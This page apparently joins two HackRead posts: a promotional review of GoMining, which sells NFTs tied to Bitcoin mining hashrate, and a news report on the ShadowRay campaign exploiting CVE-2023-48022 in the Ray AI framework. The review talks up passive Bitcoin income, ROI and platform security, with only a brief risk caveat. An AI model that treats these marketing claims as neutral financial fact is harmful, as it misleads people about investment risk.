This is a post from HackRead.com Read the original post: GoMining Review: This Platform Makes Bitcoin Mining Possible Through NFTs

For most crypto enthusiasts, participating in Bitcoin mining remains a pipe dream – between the technical complexity, expensive hardware, and constant upkeep, it seems out of reach for the average person trying to dip their toes into crypto.

But what if you could earn passive Bitcoin without needing to become an overnight blockchain expert or breaking the bank on specialized equipment? A new platform called GoMining is turning that pipedream into reality for everyday crypto fans.

GoMining leverages non-fungible tokens (NFTs) to open up simple, accessible Bitcoin mining opportunities for the masses. By abstracting away traditional mining barriers through tokenization, the platform makes earning Bitcoin rewards possible for literally anyone with just a few clicks. And importantly, their approach maintains a strong focus on safety and security for users (more on that later).

Curious to learn how GoMining is pioneering the democratization of crypto mining? Read on as we dive into the technicals. We will also uncover how you can try the platform and mine BTC using a 7-day free trial.

****What is GoMining?****

At its core, GoMining is an infrastructure project with a laser focus on efficient, sustainable Bitcoin mining. The team runs a global network of nine data centers packing a massive amount of collective computing power – we’re talking over two exahashes and counting.

These strategically located mining operations maximize energy efficiency by using proprietary hardware and service centers. In other words, GoMining handles all the heavy lifting of optimizing Bitcoin mining at an enterprise scale.

Now, here’s the neat innovation that opens up access: GoMining developed not one but two avenues for individuals to passively participate in those institutional-grade mining returns.

First, there’s the GoMining Token (GMT) – an exchange-tradeable cryptocurrency representing fractional ownership of hashrate from the GoMining mining infrastructure. Pretty straightforward staking model if you’re familiar with crypto.  

But then there’s also the **NFT mining rig offerings**. These specialized NFTs essentially tokenize specific pieces of GoMining’s real-world mining hardware, allowing holders to collect payouts. When a user purchases an NFT, they start receiving mining rewards directly into their Bitcoin wallet **within 24 hours**, and these rewards continue daily.

By blending infrastructure scale with tokenized participation models, GoMining aims to finally demystify and democratize Bitcoin mining for the masses. No need to run your own solo rig from your garage anymore!

****Problems it solves****

For individual miners, GoMining fixes several major headaches:

*   **No More Expensive Upfront Costs** – GoMining lets anyone purchase fractional mining capability. So rather than investing thousands in your setup, you can start earning with mining NFTs from a significantly smaller budget.
*   **It Handles the Technical Complexity** – No need to become an expert to participate! GoMining manages all mining operations and logistics for you from their optimized facilities.
*   **Low Electricity Costs** – GoMining leverages scale across global data centers located in low electricity cost regions, which translates to competitive rewards.
*   **Always Up-to-Date Equipment** – As mining hardware evolves, GoMining continually upgrades their infrastructure. This means your mining NFTs tap into the latest and most efficient tech automatically.

****Virtual Miners: NFTs Explained****

Okay, let’s break down these NFTs in a bit more detail. As mentioned, GoMining’s “Virtual Miners” are specialized NFTs that give holders fractional ownership of the platform’s global mining infrastructure.

In plain terms, these NFTs let you earn passive Bitcoin without dealing with the hardware or logistics yourself. By tokenizing mining equipment into digital assets, GoMining opened up access for the everyday crypto fan to participate in heavy-duty rewards previously only possible at an institutional level.

****Minting New Virtual Miners****

Each time GoMining expands by deploying new physical miners in their data centers, a matching batch of Virtual Miner NFTs gets minted and listed. The ERC-721 blockchain standard ensures each NFT is provably unique and traceable.

When checking out NFT offerings in GoMining’s shop, you’ll notice details around entitled hashrate. This defines how much mining power (TH/s) backings that NFT, which translates to your output. Rather than buying rigs, you’re buying rights to fractional productivity.

****Plug In and Start Earning Bitcoin****

Once you purchase a Virtual Miner NFT, it gets transferred directly to your crypto wallet. Almost instantly, you’ll start accumulating daily Bitcoin mining rewards every 24 hours. Payout calculations are based on your share of GoMining’s collective hashrate. It’s like owning a slice of an industrial-capacity operation.

As market conditions shift, NFT prices fluctuate but broadly align with mining profitability. You can always sell your NFT later if desired too.

****Future-Proofed With Auto-Upgraded Hashrate****

As crypto mining hardware keeps advancing, GoMining continually acquires faster and greener rigs to stay competitive. Rather than making you buy new NFTs each upgrade cycle, your existing Virtual Miners can be seamlessly upgraded as well! By burning lower efficiency NFTs, GoMining issues you new tokens representing hashrate from the latest gear. This ensures you stay viable for the long haul.

****Why Virtual Miner NFTs Beat DIY Mining****

*   Dodges hardware costs and headaches
*   Daily BTC deposits straight to your wallet
*   Hashrate auto-scales to stay optimized
*   Easy tradability provides liquidity

****Steps to Start Mining BTC with GoMining NFTs (+ 7 Day Free Trial)****

Ready to start earning passive Bitcoin through GoMining’s NFT mining platform? The process is simple:

****Step 1: Create Your GoMining Account****

  
Go to app.gmt.io and click “Get Started” in the top right corner. You’ll need to enter a valid email and create a secure password. Make sure to use an email you can access, as you’ll receive verification codes for the next steps.

You can also create an account by connecting your wallet. Current supported wallets include WalletConnect, Trust Wallet, MetaMask, and TON Wallet.

****Step 2: Complete KYC Verification****

To comply with Anti-Money Laundering regulations, GoMining requires users to complete a quick know-your-customer (KYC) check. Pretty basic stuff in the industry these days thanks to the rapid increase in crypto regulation. 

Getting a photo ID like a driver’s license or passport ready to hand expedites the verification process. You will need to upload a photo of one document, and you will need to take a selfie. You can do this on your desktop, or a mobile device.

Rest assured GoMining uses advanced encryption and access controls to secure the personal data provided. All in all, the KYC process should only take a few minutes

****Step 3: Start Your 7 Day NFT Mining Free Trial****

GoMining offers new users a 7-day free NFT trial to experience mining rewards firsthand. You’ll receive a demo Virtual Miner NFT with 16 TH/s allocated to your account. Finding the free trial is easy. Just log into your GoMining account and navigate to the “NFT Game” section.

  
Over the next week, you’ll accumulate real BTC payouts based on that hashrate. Payouts are simply deposited into a virtual wallet during the trial period. You will receive real BTC rewards as if you owned a real NFT – but the only difference is that the rewards are saved to your virtual balance.

To maximize your profits, you need to log in to the platform every day and “Service” your mining rig. To do this, simply come back to the same menu and click the service button and you’re good to go. There will be a countdown timer that tells you how long you need to wait before you can do it again. Each time you service your rig, you will get daily rewards and increase your payout. 

****Step 4: Buying Your First Virtual NFT Miner****

After testing out Bitcoin mining rewards during the free trial period, it’s time to graduate to your own Virtual Miner NFT connected directly to your wallet.

Start by opening the NFT Marketplace within your GoMining account. Browse through the listings of available Virtual Miners with details on represented hash rates and real-time pricing. Consider factors like:

*   Your overall budget
*   Desired mining power allocation
*   Current market conditions influencing mining profitability  
    

Once you’ve found the perfect Virtual Miner NFT matching your needs and price range, click “Buy Now” to purchase. Confirm the details look accurate on the checkout screen.

After completing the transaction, your new NFT will instantly show in your wallet, while your free trial NFT disabled. Any demo BTC accumulated transfers over plus your first actual rewards. Now you’ll continually collect Bitcoin payouts based on your owned hashrate. 

****Step 5: Understanding the ROI****

When you first start exploring the site, it can be a little overwhelming to get your bearings and understand all of the lingo. In general, the most important thing you need to keep in mind is the ROI potential.

The good news is that each Virtual Miner comes with a handy toolbar that lets you calculate the predicted ROI of each investment. You can use the slider to see your ROI over various timeframes, and you can also select and deselect the discounts and bonuses from the servicing function we mentioned earlier, as well as the 10% discount from using the native GMT token.

Once you have chosen your parameters, you will see an estimate window like this:

Of course, this is not to be taken as an exact measure. There are plenty of variables at play. This is crypto, after all.

****Managing Your Mining****

After you’ve started mining with GoMining, there are several ways to manage and optimize your mining operation.

****Tracking Performance****

Logging into your dashboard gives you a real-time snapshot of what your miners are up to from different angles – your overall network hashrate contribution, total BTC earned, projected future value based on market conditions, yield over time, etc.

Having all this visibility in one place lets you easily track progress, spot trends, and figure out optimal times to make money moves.

****Reinvesting to Grow Your Position****

A proven investing mantra is letting your money work for you through compound interest. As such, GoMining enables seamlessly upgrading your Virtual Miner NFTs to more powerful models with greater hashrate allotments, earning you more Bitcoin rewards. This multiplier effect accelerates mining revenue through continuous expansion of your infrastructure holdings.

****Cashing Out****

Whenever you want to realize your mining profits, you can easily withdraw your Bitcoin rewards to an external wallet. GoMining covers the blockchain transaction fees, ensuring you receive your full earnings. Alternatively, you can sell your Virtual Miner NFTs on the secondary NFT marketplace, allowing you to potentially profit from appreciation in the value of your mining power.

****GoMining Security** **

Let’s talk security – because when money is on the line, protection matters. First of all, it’s worth mentioning that GoMining alleviates many of the security risks associated with traditional mining. Solo miners often have to consent with concerns such as:  

*   **Hardware Vulnerabilities**: Solo home mining rigs can attract hackers looking to infect setups with malware to make off with hard-earned crypto.
*   **Technical Knowledge Gaps**: Miners who are still getting up to speed with security best practices are vulnerable to making mistakes. Holes in setups expose them to attacks.
*   **Physical Risks**: Accidents happen, and thievery is always a risk. When operating a mining rig, you need to take both digital and physical security into account. 

GoMining lifts those burdens by handling everything safely in professional data centers, which is certainly a significant benefit when it comes to maintaining peace of mind. 

****GoMining Security and Safety Features** **

Okay, now we know GoMining takes away those pain points, let’s take a look at some of the safety and security features of the platform itself:

*   **Reward Wallet Verification:** GoMining employs a rigorous verification process to ensure that you are the owner of the cryptocurrency wallet you provide and so that it can correctly determine where the BTC mining reward should be safely distributed. 

*   **CertiK Smart Contract Audit:** GoMining has undergone an in-depth audit by CertiK. This evaluation validated the security of the platform’s code and blockchain infrastructure.

*   **Two-Factor Authentication 2FA**: This adds a critical layer of security to your account, making it significantly harder for bad actors to gain access. 

*   **KYC Compliance:** GoMining follows industry standard KYC compliance to mitigate fraudulent activity. 

****Tips to Enhance Security****

While GoMining locks down their systems, it’s important not to forget the role of the user when it comes to ensuring security. Be sure to closely guard account details, and never share your private passwords or seed phrases, even when prompted. As per GoMining, they will never reach out directly and ask for sensitive information.

When purchasing GMT tokens, it’s best to do so through the platform itself, major verified exchanges, or the Trust Wallet application. 

Finally, proactively verify the authenticity of any social media profiles. Cross-check them against GoMining’s official, confirmed channels list.

****GMT Tokenomics****

  
As you may have noticed, there are some pretty nice rewards and discounts for using the native GMT token. Let’s take a look at some of the token’s utility:

****Fee Discount Token****

By paying platform fees in GMT, NFT holders receive a 10% discount reducing overhead costs and boosting mined Bitcoin. This incentive kickstarts regular token circulation.

****Deflationary Burn and Under-Mint****

When GMT gets spent on fees, tokens get permanently destroyed via burning. Meanwhile, the system mints new GMT representing a significant percentage of the amount burned. This continual burn and under-mint process structurally diminishes circulating supply over time, applying incremental deflationary pressure on GMT.  

****Reward Redistribution****

Of the amount reminted, tokens are distributed across platform incentives like miners, service providers, community grants, liquidity pools, and veToken stakers. This stimulation shares wealth while aligning stakeholders.

****Decentralized Governance****

Users committing to locking up GMT get veToken status. This earns governance votes steering the DAO’s direction while collecting fee distribution rewards. Aligning stakeholders reduces risks from fragmentation while bringing community oversight.

****Closing Thoughts****

GoMining is aiming to flip the script on the idea that crypto mining is a highly technical process that only hardcore blockchain experts can pull off. 

By packaging up institutional-grade mining infrastructure into user-friendly NFTs, GoMining opened the door for regular crypto fans to tap into passive income. Now there’s no need to mess with clunky hardware and maintenance – it’s condensed into a few clicks.

At the same time, Gomining has not had to sacrifice viability or efficiency, since all the heavy lifting still happens behind the scenes at a massive scale. Users just get to kick back collecting Bitcoin off the mass output. 

Of course, it’s still important to enter into this with all of the same savvy and diligence as any crypto endeavour. Keep in mind that the market is volatile and that returns are not guaranteed. There are many factors at play, so be sure to do your research so you can find a set-up that works best for your finances and your risk profile. 

With that said, if you have always wanted to try out Bitcoin mining for yourself but have never had the time, energy, or money to set up your rig, Gomining just might be the solution you were looking for. 

****FAQs********What blockchains are NFTs issued on?****

GoMining NFT collections are issued on both Ethereum (ERC-721 standard) and Binance Smart Chain (BEP-721 standard). Some popular collections include The Greedy Machines, the Khabib Collection, The East Collection, and The North Collection.

****What makes GoMining’s NFTs unique?****

The NFTs represent fractional ownership of GoMining’s real computing infrastructure actively mining Bitcoin. Owning them entitles holders to daily mining rewards proportional to the hashrate tied to each NFT. They also function as creative digital artworks tradable on marketplaces.

****How can I upgrade my NFT’s mining power?****

GoMining enables upgrading your NFTs to higher hashrate tiers, increasing potential rewards. Twenty levels exist, with Level 1 representing 1 TH/s and Level 20 maxing at 5000 TH/s. Upgrading costs less than buying a separate NFT at the target level. The higher your current tier, the cheaper upgrading becomes.

****What fees apply and is there a way to reduce them?****

Daily electricity and maintenance fees get deducted from rewards, but discounts apply:

*   Level Discount: 0.3% – 1.2% off based on total hashrate
*   Service Discount: Up to 3% for clicking a daily button
*   Solo Mining Bonus: Extra off as a platform incentive
*   10% GMT Discount: When paying fees in native tokens

Activating discounts significantly increases net Bitcoin payouts.

1.  Could Bitcoin Be The Future Of DeFi?
2.  What is Cloud Mining and How Does it Work?
3.  What is Blockchain Gaming and its Play-to-Earn Model?
4.  What is the tokenization process and why it is so important?
5.  Powerloom to Hold First Ever Node Mint on Polygon Network

GoMining Review: This Platform Makes Bitcoin Mining Possible Through NFTs

By Waqas
An unpatched vulnerability is exposing the Ray AI framework to the "ShadowRay" attack!
This is a post from HackRead.com Read the original post: New ShadowRay Campaign Targets Ray AI Framework in Global Attack

Discover the ShadowRay campaign exploiting CVE-2023-48022 in the Ray AI framework, risking thousands of companies. Attackers hijack resources, mine crypto, and steal data, impacting education, finance, and healthcare. Major users include Uber, Amazon, and Netflix – Urgent patch advised.

Recent revelations from the Oligo research team have shed light on a troubling development in cybersecurity. Dubbed “ShadowRay” by the researchers, it represents the first documented instance of an active attack campaign targeting AI workloads within the widely utilized Ray open-source AI framework.

****CVE-2023-48022****

The core of the issue lies in a critical vulnerability, known as CVE-2023-48022, which has been a subject of contention and remains unpatched. This vulnerability exposes thousands of companies and their AI infrastructure to exploitation, allowing malicious actors to hijack computing resources and potentially leak sensitive data.

Shockingly, this security vulnerability has been actively exploited for the past seven months, impacting various sectors including education, cryptocurrency, and biopharma.

According to the technical findings stated in Oligo Security’s blog post shared with Hackread.com ahead of publication on Tuesday, the exploit has led to the compromise of numerous Ray servers worldwide.

These compromised machines, some of which have been under attack for over half a year, pose a significant threat to the integrity and security of sensitive data. Attackers have been able to obtain valuable insights from command history stored on these machines, potentially exposing critical production secrets.

> _“As of now, Oligo has found hundreds of compromised clusters. Each cluster consists of many nodes, which are machines connected to the cluster over the network. Most nodes have GPUs, which are leveraged by attackers for cryptocurrency mining, making this infrastructure an even bigger target for attacks. In other words, attackers choose to compromise these machines not only because they can obtain valuable sensitive information, but because GPUs are very expensive and difficult to obtain, especially these days.”_
> 
> Oligo Security

****Who Uses Ray?****

Currently, Ray boasts 30,000 stars on GitHub, indicating a feature enabling users to bookmark repositories of interest or utility, akin to “liking” content on social media platforms.

Furthermore, Ray finds application in production environments across some of the globe’s leading organizations, such as Ant Group, an affiliate company of the Chinese conglomerate Alibaba Group, Uber, Amazon, LinkedIn, Doordash, Netflix, Spotify, Pinterest, and OpenAI, etc.

******Expert Weighing In******

John Bambenek, President at Bambenek Consulting, emphasized the inherent challenges in defending against such attacks, particularly within AI environments. He highlighted the ongoing struggle to establish robust threat detection mechanisms, noting that the current landscape lacks comprehensive visibility. With attackers increasingly targeting data-rich environments, the need for proactive measures to safeguard AI workloads has never been more pressing.

_“_AI has been sprung on environments and we are still struggling with getting basic frameworks in place to start detecting threats and attacks. We have pieces, however, there is no way to know if this is the first attack as we still lack a notion of how to get complete visibility. That said, it’s clear attackers know full well this is a blind spot and anything with lots of data will be attractive targets._“_

As organizations grapple with the implications of ShadowRay, caution and proactive security measures are important. The Oligo research team has urged all entities utilizing Ray to conduct thorough reviews of their environments, identify any potential vulnerabilities, and remain vigilant for signs of suspicious activity.

In today’s world, where data is incredibly valuable, it’s more crucial than ever to protect against the constantly changing dynamics of cybersecurity threats.

1.  NIST Cybersecurity Framework 2.0: Guide for All Orgs
2.  AI Scams, Human Trafficking Fuel Global Cybercrime Surge
3.  Linux, Windows, macOS Hit By “Alchimist” Attack Framework
4.  ChatGPT Plugins Exposed to Critical Flaws, Risked User Data
5.  Flaws in QuickBlox Framework Expose Millions of User Records

Tag

#mac